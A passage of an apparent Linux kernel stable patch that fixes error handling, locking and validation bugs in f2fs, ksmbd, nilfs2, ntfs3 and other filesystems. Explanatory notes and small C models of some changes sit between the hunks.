+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 87664c309b3c8..4b44ca1decdd3 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3569,6 +3569,7 @@ int f2fs_quota_sync(struct super_block *sb, int type);
+ loff_t max_file_blocks(struct inode *inode);
+ void f2fs_quota_off_umount(struct super_block *sb);
+ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason);
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag);
+ void f2fs_handle_error(struct f2fs_sb_info *sbi, unsigned char error);
+ int f2fs_commit_super(struct f2fs_sb_info *sbi, bool recover);
+ int f2fs_sync_fs(struct super_block *sb, int sync);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 773b3ddc2cd72..bf37983304a33 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -2115,7 +2115,11 @@ static int f2fs_ioc_start_atomic_write(struct file *filp)
+ 		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 	} else {
+ 		/* Reuse the already created COW inode */
+-		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		ret = f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
+ 	}
+ 
+ 	f2fs_write_inode(inode, NULL);
+@@ -3004,15 +3008,16 @@ int f2fs_transfer_project_quota(struct inode *inode, kprojid_t kprojid)
+ 	struct dquot *transfer_to[MAXQUOTAS] = {};
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct super_block *sb = sbi->sb;
+-	int err = 0;
++	int err;
+ 
+ 	transfer_to[PRJQUOTA] = dqget(sb, make_kqid_projid(kprojid));
+-	if (!IS_ERR(transfer_to[PRJQUOTA])) {
+-		err = __dquot_transfer(inode, transfer_to);
+-		if (err)
+-			set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
+-		dqput(transfer_to[PRJQUOTA]);
+-	}
++	if (IS_ERR(transfer_to[PRJQUOTA]))
++		return PTR_ERR(transfer_to[PRJQUOTA]);
++
++	err = __dquot_transfer(inode, transfer_to);
++	if (err)
++		set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
++	dqput(transfer_to[PRJQUOTA]);
+ 	return err;
+ }
+ 
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index ee6836478efe6..aa928d1c81597 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1792,8 +1792,8 @@ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control)
+ 				prefree_segments(sbi));
+ 
+ 	cpc.reason = __get_cp_reason(sbi);
+-	sbi->skipped_gc_rwsem = 0;
+ gc_more:
++	sbi->skipped_gc_rwsem = 0;
+ 	if (unlikely(!(sbi->sb->s_flags & SB_ACTIVE))) {
+ 		ret = -EINVAL;
+ 		goto stop;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 8d1e8c537daf0..b0fbdee16a96c 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -245,10 +245,16 @@ retry:
+ 	} else {
+ 		blkcnt_t count = 1;
+ 
++		err = inc_valid_block_count(sbi, inode, &count);
++		if (err) {
++			f2fs_put_dnode(&dn);
++			return err;
++		}
++
+ 		*old_addr = dn.data_blkaddr;
+ 		f2fs_truncate_data_blocks_range(&dn, 1);
+ 		dec_valid_block_count(sbi, F2FS_I(inode)->cow_inode, count);
+-		inc_valid_block_count(sbi, inode, &count);
++
+ 		f2fs_replace_block(sbi, &dn, dn.data_blkaddr, new_addr,
+ 					ni.version, true, false);
+ 	}
+@@ -4916,48 +4922,6 @@ int f2fs_check_write_pointer(struct f2fs_sb_info *sbi)
+ 	return 0;
+ }
+ 
+-static bool is_conv_zone(struct f2fs_sb_info *sbi, unsigned int zone_idx,
+-						unsigned int dev_idx)
+-{
+-	if (!bdev_is_zoned(FDEV(dev_idx).bdev))
+-		return true;
+-	return !test_bit(zone_idx, FDEV(dev_idx).blkz_seq);
+-}
+-
+-/* Return the zone index in the given device */
+-static unsigned int get_zone_idx(struct f2fs_sb_info *sbi, unsigned int secno,
+-					int dev_idx)
+-{
+-	block_t sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+-
+-	return (sec_start_blkaddr - FDEV(dev_idx).start_blk) >>
+-						sbi->log_blocks_per_blkz;
+-}
+-
+-/*
+- * Return the usable segments in a section based on the zone's
+- * corresponding zone capacity. Zone is equal to a section.
+- */
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(
+-		struct f2fs_sb_info *sbi, unsigned int segno)
+-{
+-	unsigned int dev_idx, zone_idx;
+-
+-	dev_idx = f2fs_target_device_index(sbi, START_BLOCK(sbi, segno));
+-	zone_idx = get_zone_idx(sbi, GET_SEC_FROM_SEG(sbi, segno), dev_idx);
+-
+-	/* Conventional zone's capacity is always equal to zone size */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->segs_per_sec;
+-
+-	if (!sbi->unusable_blocks_per_sec)
+-		return sbi->segs_per_sec;
+-
+-	/* Get the segment count beyond zone capacity block */
+-	return sbi->segs_per_sec - (sbi->unusable_blocks_per_sec >>
+-						sbi->log_blocks_per_seg);
+-}
+-
+ /*
+  * Return the number of usable blocks in a segment. The number of blocks
+  * returned is always equal to the number of blocks in a segment for
+@@ -4970,23 +4934,13 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(
+ 			struct f2fs_sb_info *sbi, unsigned int segno)
+ {
+ 	block_t seg_start, sec_start_blkaddr, sec_cap_blkaddr;
+-	unsigned int zone_idx, dev_idx, secno;
+-
+-	secno = GET_SEC_FROM_SEG(sbi, segno);
+-	seg_start = START_BLOCK(sbi, segno);
+-	dev_idx = f2fs_target_device_index(sbi, seg_start);
+-	zone_idx = get_zone_idx(sbi, secno, dev_idx);
+-
+-	/*
+-	 * Conventional zone's capacity is always equal to zone size,
+-	 * so, blocks per segment is unchanged.
+-	 */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->blocks_per_seg;
++	unsigned int secno;
+ 
+ 	if (!sbi->unusable_blocks_per_sec)
+ 		return sbi->blocks_per_seg;
+ 
++	secno = GET_SEC_FROM_SEG(sbi, segno);
++	seg_start = START_BLOCK(sbi, segno);
+ 	sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+ 	sec_cap_blkaddr = sec_start_blkaddr + CAP_BLKS_PER_SEC(sbi);
+ 
+@@ -5020,11 +4974,6 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(struct f2fs_sb_info *sbi
+ 	return 0;
+ }
+ 
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(struct f2fs_sb_info *sbi,
+-							unsigned int segno)
+-{
+-	return 0;
+-}
+ #endif
+ unsigned int f2fs_usable_blks_in_seg(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+@@ -5039,7 +4988,7 @@ unsigned int f2fs_usable_segs_in_sec(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+ {
+ 	if (f2fs_sb_has_blkzoned(sbi))
+-		return f2fs_usable_zone_segs_in_sec(sbi, segno);
++		return CAP_SEGS_PER_SEC(sbi);
+ 
+ 	return sbi->segs_per_sec;
+ }
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index be8f2d7d007b9..cd65778fc9822 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -104,6 +104,9 @@ static inline void sanity_check_seg_type(struct f2fs_sb_info *sbi,
+ #define CAP_BLKS_PER_SEC(sbi)					\
+ 	((sbi)->segs_per_sec * (sbi)->blocks_per_seg -		\
+ 	 (sbi)->unusable_blocks_per_sec)
++#define CAP_SEGS_PER_SEC(sbi)					\
++	((sbi)->segs_per_sec - ((sbi)->unusable_blocks_per_sec >>\
++	(sbi)->log_blocks_per_seg))
+ #define GET_SEC_FROM_SEG(sbi, segno)				\
+ 	(((segno) == -1) ? -1: (segno) / (sbi)->segs_per_sec)
+ #define GET_SEG_FROM_SEC(sbi, secno)				\
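
The new CAP_SEGS_PER_SEC() macro above converts the per-section unusable block
count into whole lost segments with a right shift. A worked example with
invented geometry (512-block segments, 2 segments per section, 640 unusable
blocks at the end of the zone):

#include <stdio.h>

int main(void)
{
	unsigned int segs_per_sec = 2;
	unsigned int log_blocks_per_seg = 9;	/* 512 blocks per segment */
	unsigned int unusable_blocks_per_sec = 640;

	unsigned int cap_segs = segs_per_sec -
		(unusable_blocks_per_sec >> log_blocks_per_seg);

	/* 640 >> 9 == 1, so one full segment is lost to zone capacity. */
	printf("usable segments per section: %u\n", cap_segs);
	return 0;
}
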
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 14c87399efea2..5af05411818a5 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -3861,7 +3861,7 @@ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason)
+ 	f2fs_up_write(&sbi->sb_lock);
+ }
+ 
+-static void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
+ {
+ 	spin_lock(&sbi->error_lock);
+ 	if (!test_bit(flag, (unsigned long *)sbi->errors)) {
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index df27afd71ef48..3d68bfa75cf2a 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -550,9 +550,9 @@ out:
+ 	if (!strcmp(a->attr.name, "iostat_period_ms")) {
+ 		if (t < MIN_IOSTAT_PERIOD_MS || t > MAX_IOSTAT_PERIOD_MS)
+ 			return -EINVAL;
+-		spin_lock(&sbi->iostat_lock);
++		spin_lock_irq(&sbi->iostat_lock);
+ 		sbi->iostat_period_ms = (unsigned int)t;
+-		spin_unlock(&sbi->iostat_lock);
++		spin_unlock_irq(&sbi->iostat_lock);
+ 		return count;
+ 	}
+ #endif
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 15de1385012eb..18611241f4513 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -2387,6 +2387,9 @@ static int journal_unmap_buffer(journal_t *journal, struct buffer_head *bh,
+ 			spin_unlock(&jh->b_state_lock);
+ 			write_unlock(&journal->j_state_lock);
+ 			jbd2_journal_put_journal_head(jh);
++			/* Already zapped buffer? Nothing to do... */
++			if (!bh->b_bdev)
++				return 0;
+ 			return -EBUSY;
+ 		}
+ 		/*
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index cead696b656a8..df8fb076f6f14 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -221,22 +221,22 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ {
+ 	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+ 	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
+-	struct ksmbd_crypto_ctx *ctx;
++	struct ksmbd_crypto_ctx *ctx = NULL;
+ 	char *construct = NULL;
+ 	int rc, len;
+ 
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+ 	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
+ 	if (rc) {
+ 		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
+ 		goto out;
+ 	}
+ 
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
+ 	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+ 				 ntlmv2_hash,
+ 				 CIFS_HMAC_MD5_HASH_SIZE);
+@@ -272,6 +272,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+ 		goto out;
+ 	}
++	ksmbd_release_crypto_ctx(ctx);
++	ctx = NULL;
+ 
+ 	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
+ 	if (rc) {
+@@ -282,7 +284,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
+ 		rc = -EINVAL;
+ out:
+-	ksmbd_release_crypto_ctx(ctx);
++	if (ctx)
++		ksmbd_release_crypto_ctx(ctx);
+ 	kfree(construct);
+ 	return rc;
+ }
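
The ksmbd_auth_ntlmv2() hunks above narrow the crypto context's
lifetime: the hmac-md5 context is now acquired only after
calc_ntlmv2_hash() has succeeded, and released (and NULLed) as soon as
its last use is done, so the shared out: label frees it only when it is
still held. A generic sketch of that acquire-late/release-early shape,
using hypothetical acquire()/release() helpers rather than the ksmbd
crypto API:

	#include <stdlib.h>

	struct ctx { int dummy; };
	static struct ctx *acquire(void) { return malloc(sizeof(struct ctx)); }
	static void release(struct ctx *c) { free(c); }
	static int cheap_step(void) { return 0; }	/* stand-ins for */
	static int use_ctx(struct ctx *c) { (void)c; return 0; } /* real work */
	static int late_step(void) { return 0; }

	static int do_auth(void)
	{
		struct ctx *ctx = NULL;	/* NULL until actually acquired */
		int rc;

		rc = cheap_step();	/* may fail before any resource is held */
		if (rc)
			goto out;

		ctx = acquire();	/* acquired only once it is needed */
		if (!ctx)
			return -1;

		rc = use_ctx(ctx);
		if (rc)
			goto out;

		release(ctx);		/* last use done: release early... */
		ctx = NULL;		/* ...so "out:" cannot double-free */

		rc = late_step();
	out:
		if (ctx)
			release(ctx);
		return rc;
	}

	int main(void) { return do_auth(); }
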
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index 8ce17b3fb8dad..f19de20c2960c 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -109,7 +109,15 @@ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ 						  unsigned int id)
+ {
+-	return xa_load(&sess->tree_conns, id);
++	struct ksmbd_tree_connect *tcon;
++
++	tcon = xa_load(&sess->tree_conns, id);
++	if (tcon) {
++		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++			tcon = NULL;
++	}
++
++	return tcon;
+ }
+ 
+ struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+diff --git a/fs/ksmbd/mgmt/tree_connect.h b/fs/ksmbd/mgmt/tree_connect.h
+index 0f97ddc1e39c0..700df36cf3e30 100644
+--- a/fs/ksmbd/mgmt/tree_connect.h
++++ b/fs/ksmbd/mgmt/tree_connect.h
+@@ -14,6 +14,8 @@ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
+ 
++#define TREE_CONN_EXPIRE		1
++
+ struct ksmbd_tree_connect {
+ 	int				id;
+ 
+@@ -25,6 +27,7 @@ struct ksmbd_tree_connect {
+ 
+ 	int				maximal_access;
+ 	bool				posix_extensions;
++	unsigned long			status;
+ };
+ 
+ struct ksmbd_tree_conn_status {
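
The TREE_CONN_EXPIRE bit added above turns tcon->status into a small
flag word: the ksmbd_tree_conn_lookup() hunk earlier treats an expired
tree connection as absent, and the smb2_tree_disconnect() hunk later in
this patch claims the bit with test_and_set_bit(), so exactly one of
several racing disconnects proceeds to tear the connection down. A C11
model of that claim-once semantics (names are illustrative):

	#include <stdatomic.h>
	#include <stdbool.h>
	#include <stdio.h>

	#define TREE_CONN_EXPIRE 1

	struct tcon_model { atomic_ulong status; };

	/* Mirrors test_and_set_bit(): returns false only for the first
	 * caller, so only one disconnect path wins. */
	static bool already_expired(struct tcon_model *t)
	{
		unsigned long bit = 1UL << TREE_CONN_EXPIRE;

		return atomic_fetch_or(&t->status, bit) & bit;
	}

	/* Mirrors the xa_load() + test_bit() check in the lookup. */
	static bool lookup_visible(struct tcon_model *t)
	{
		return !(atomic_load(&t->status) & (1UL << TREE_CONN_EXPIRE));
	}

	int main(void)
	{
		struct tcon_model t = { .status = 0 };
		int first = already_expired(&t);	/* 0: we claimed it */
		int second = already_expired(&t);	/* 1: too late */

		printf("%d %d %d\n", first, second, lookup_visible(&t));
		return 0;
	}
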
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 651d1d01234be..8c2bc513445c3 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -614,6 +614,7 @@ err_unregister:
+ static void __exit ksmbd_server_exit(void)
+ {
+ 	ksmbd_server_shutdown();
++	rcu_barrier();
+ 	ksmbd_release_inode_hash();
+ }
+ 
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 5de7b41d64044..acd66fb40c5f0 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1456,7 +1456,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		 * Reuse session if an anonymous user tries to connect
+ 		 * on reauthentication.
+ 		 */
+-		if (ksmbd_anonymous_user(user)) {
++		if (conn->binding == false && ksmbd_anonymous_user(user)) {
+ 			ksmbd_free_user(user);
+ 			return 0;
+ 		}
+@@ -1470,7 +1470,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		sess->user = user;
+ 	}
+ 
+-	if (user_guest(sess->user)) {
++	if (conn->binding == false && user_guest(sess->user)) {
+ 		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
+ 	} else {
+ 		struct authenticate_message *authblob;
+@@ -1713,6 +1713,11 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (user_guest(sess->user)) {
++			rc = -EOPNOTSUPP;
++			goto out_err;
++		}
++
+ 		conn->binding = true;
+ 	} else if ((conn->dialect < SMB30_PROT_ID ||
+ 		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+@@ -1799,6 +1804,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				}
+ 				kfree(sess->Preauth_HashValue);
+ 				sess->Preauth_HashValue = NULL;
++			} else {
++				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
++						le32_to_cpu(negblob->MessageType));
++				rc = -EINVAL;
+ 			}
+ 		} else {
+ 			/* TODO: need one more negotiation */
+@@ -1821,6 +1830,8 @@ out_err:
+ 		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
+ 	else if (rc == -ENOMEM)
+ 		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++	else if (rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+ 	else if (rc)
+ 		rsp->hdr.Status = STATUS_LOGON_FAILURE;
+ 
+@@ -2053,11 +2064,12 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	if (!tcon) {
++	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+ 		struct smb2_tree_disconnect_req *req =
+ 			smb2_get_msg(work->request_buf);
+ 
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+ 		return 0;
+@@ -4912,6 +4924,9 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 	int rc = 0, len;
+ 	int fs_infoclass_size = 0;
+ 
++	if (!share->path)
++		return -EIO;
++
+ 	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
+ 	if (rc) {
+ 		pr_err("cannot create vfs path\n");
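
With the -EOPNOTSUPP branch added above, the out_err ladder in
smb2_sess_setup() maps each internal errno to a distinct SMB2 status
before falling back to STATUS_LOGON_FAILURE (the first branch, keyed on
a condition above this hunk, yields STATUS_NETWORK_SESSION_EXPIRED). A
compact model of the visible part of that mapping, with plain enum
constants standing in for the wire values:

	#include <errno.h>

	enum status_model {	/* illustrative stand-ins only */
		OK, INSUFFICIENT_RESOURCES, NOT_SUPPORTED, LOGON_FAILURE,
	};

	static enum status_model map_sess_setup_rc(int rc)
	{
		if (rc == -ENOMEM)
			return INSUFFICIENT_RESOURCES;
		if (rc == -EOPNOTSUPP)	/* new: guest sessions refuse binding */
			return NOT_SUPPORTED;
		return rc ? LOGON_FAILURE : OK;
	}

	int main(void)
	{
		return map_sess_setup_rc(-EOPNOTSUPP) == NOT_SUPPORTED ? 0 : 1;
	}
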
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 03087ef1c7b4a..5b49e5365bb30 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -67,6 +67,8 @@
+ 
+ #define OPENOWNER_POOL_SIZE	8
+ 
++static void nfs4_state_start_reclaim_reboot(struct nfs_client *clp);
++
+ const nfs4_stateid zero_stateid = {
+ 	{ .data = { 0 } },
+ 	.type = NFS4_SPECIAL_STATEID_TYPE,
+@@ -330,6 +332,8 @@ do_confirm:
+ 	status = nfs4_proc_create_session(clp, cred);
+ 	if (status != 0)
+ 		goto out;
++	if (!(clp->cl_exchange_flags & EXCHGID4_FLAG_CONFIRMED_R))
++		nfs4_state_start_reclaim_reboot(clp);
+ 	nfs41_finish_session_reset(clp);
+ 	nfs_mark_client_ready(clp, NFS_CS_READY);
+ out:
+diff --git a/fs/nilfs2/bmap.c b/fs/nilfs2/bmap.c
+index 798a2c1b38c6c..7a8f166f2c8d8 100644
+--- a/fs/nilfs2/bmap.c
++++ b/fs/nilfs2/bmap.c
+@@ -67,20 +67,28 @@ int nilfs_bmap_lookup_at_level(struct nilfs_bmap *bmap, __u64 key, int level,
+ 
+ 	down_read(&bmap->b_sem);
+ 	ret = bmap->b_ops->bop_lookup(bmap, key, level, ptrp);
+-	if (ret < 0) {
+-		ret = nilfs_bmap_convert_error(bmap, __func__, ret);
++	if (ret < 0)
+ 		goto out;
+-	}
++
+ 	if (NILFS_BMAP_USE_VBN(bmap)) {
+ 		ret = nilfs_dat_translate(nilfs_bmap_get_dat(bmap), *ptrp,
+ 					  &blocknr);
+ 		if (!ret)
+ 			*ptrp = blocknr;
++		else if (ret == -ENOENT) {
++			/*
++			 * If there was no valid entry in DAT for the block
++			 * address obtained by b_ops->bop_lookup, then pass
++			 * internal code -EINVAL to nilfs_bmap_convert_error
++			 * to treat it as metadata corruption.
++			 */
++			ret = -EINVAL;
++		}
+ 	}
+ 
+  out:
+ 	up_read(&bmap->b_sem);
+-	return ret;
++	return nilfs_bmap_convert_error(bmap, __func__, ret);
+ }
+ 
+ int nilfs_bmap_lookup_contig(struct nilfs_bmap *bmap, __u64 key, __u64 *ptrp,
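
The nilfs_bmap_lookup_at_level() change above does two things: it
funnels every exit through nilfs_bmap_convert_error(), and it rewrites
-ENOENT from nilfs_dat_translate() to -EINVAL. The btree has just
produced a virtual block address, so a missing DAT entry for that
address can only mean corrupted metadata, never a legitimate "not
found". The errno policy in isolation:

	#include <errno.h>

	/* A DAT miss for an address the btree handed back is corruption
	 * and must not propagate as an ordinary lookup failure. */
	static int dat_err_to_bmap_err(int ret)
	{
		return ret == -ENOENT ? -EINVAL : ret;
	}

	int main(void)
	{
		return dat_err_to_bmap_err(-ENOENT) == -EINVAL ? 0 : 1;
	}
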
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 101f2ce6ba376..209e46431a5ea 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2039,6 +2039,9 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 	struct the_nilfs *nilfs = sci->sc_super->s_fs_info;
+ 	int err;
+ 
++	if (sb_rdonly(sci->sc_super))
++		return -EROFS;
++
+ 	nilfs_sc_cstage_set(sci, NILFS_ST_INIT);
+ 	sci->sc_cno = nilfs->ns_cno;
+ 
+@@ -2722,7 +2725,7 @@ static void nilfs_segctor_write_out(struct nilfs_sc_info *sci)
+ 
+ 		flush_work(&sci->sc_iput_work);
+ 
+-	} while (ret && retrycount-- > 0);
++	} while (ret && ret != -EROFS && retrycount-- > 0);
+ }
+ 
+ /**
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index c662d2a519072..00faf41d8f97d 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2575,7 +2575,7 @@ static int read_next_log_rec(struct ntfs_log *log, struct lcb *lcb, u64 *lsn)
+ 	return find_log_rec(log, *lsn, lcb);
+ }
+ 
+-static inline bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes)
+ {
+ 	__le16 mask;
+ 	u32 min_de, de_off, used, total;
+@@ -4258,6 +4258,10 @@ check_attribute_names:
+ 	rec_len -= t32;
+ 
+ 	attr_names = kmemdup(Add2Ptr(lrh, t32), rec_len, GFP_NOFS);
++	if (!attr_names) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	lcb_put(lcb);
+ 	lcb = NULL;
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index c27b4fe575136..98491abf95b9d 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -679,9 +679,13 @@ static struct NTFS_DE *hdr_find_e(const struct ntfs_index *indx,
+ 	u32 e_size, e_key_len;
+ 	u32 end = le32_to_cpu(hdr->used);
+ 	u32 off = le32_to_cpu(hdr->de_off);
++	u32 total = le32_to_cpu(hdr->total);
+ 	u16 offs[128];
+ 
+ fill_table:
++	if (end > total)
++		return NULL;
++
+ 	if (off + sizeof(struct NTFS_DE) > end)
+ 		return NULL;
+ 
+@@ -798,6 +802,10 @@ static inline struct NTFS_DE *hdr_delete_de(struct INDEX_HDR *hdr,
+ 	u32 off = PtrOffset(hdr, re);
+ 	int bytes = used - (off + esize);
+ 
++	/* Check that the INDEX_HDR is valid before using it. */
++	if (!check_index_header(hdr, le32_to_cpu(hdr->total)))
++		return NULL;
++
+ 	if (off >= used || esize < sizeof(struct NTFS_DE) ||
+ 	    bytes < sizeof(struct NTFS_DE))
+ 		return NULL;
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 22152300e60ca..57988fedd1847 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -257,7 +257,6 @@ next_attr:
+ 			goto out;
+ 
+ 		root = Add2Ptr(attr, roff);
+-		is_root = true;
+ 
+ 		if (attr->name_len != ARRAY_SIZE(I30_NAME) ||
+ 		    memcmp(attr_name(attr), I30_NAME, sizeof(I30_NAME)))
+@@ -270,6 +269,7 @@ next_attr:
+ 		if (!is_dir)
+ 			goto next_attr;
+ 
++		is_root = true;
+ 		ni->ni_flags |= NI_FLAG_DIR;
+ 
+ 		err = indx_init(&ni->dir, sbi, attr, INDEX_MUTEX_I30);
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 2c791222c4e27..c5c022fef4e0b 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -574,6 +574,7 @@ int ni_rename(struct ntfs_inode *dir_ni, struct ntfs_inode *new_dir_ni,
+ bool ni_is_dirty(struct inode *inode);
+ 
+ /* Globals from fslog.c */
++bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes);
+ int log_replay(struct ntfs_inode *ni, bool *initialized);
+ 
+ /* Globals from fsntfs.c */
+diff --git a/fs/pstore/pmsg.c b/fs/pstore/pmsg.c
+index 18cf94b597e05..d8542ec2f38c6 100644
+--- a/fs/pstore/pmsg.c
++++ b/fs/pstore/pmsg.c
+@@ -7,10 +7,9 @@
+ #include <linux/device.h>
+ #include <linux/fs.h>
+ #include <linux/uaccess.h>
+-#include <linux/rtmutex.h>
+ #include "internal.h"
+ 
+-static DEFINE_RT_MUTEX(pmsg_lock);
++static DEFINE_MUTEX(pmsg_lock);
+ 
+ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 			  size_t count, loff_t *ppos)
+@@ -29,9 +28,9 @@ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 	if (!access_ok(buf, count))
+ 		return -EFAULT;
+ 
+-	rt_mutex_lock(&pmsg_lock);
++	mutex_lock(&pmsg_lock);
+ 	ret = psinfo->write_user(&record, buf);
+-	rt_mutex_unlock(&pmsg_lock);
++	mutex_unlock(&pmsg_lock);
+ 	return ret ? ret : count;
+ }
+ 
+diff --git a/fs/reiserfs/xattr_security.c b/fs/reiserfs/xattr_security.c
+index 857a65b057264..157ebfe2456bb 100644
+--- a/fs/reiserfs/xattr_security.c
++++ b/fs/reiserfs/xattr_security.c
+@@ -82,11 +82,15 @@ int reiserfs_security_write(struct reiserfs_transaction_handle *th,
+ 			    struct inode *inode,
+ 			    struct reiserfs_security_handle *sec)
+ {
++	char xattr_name[XATTR_NAME_MAX + 1] = XATTR_SECURITY_PREFIX;
+ 	int error;
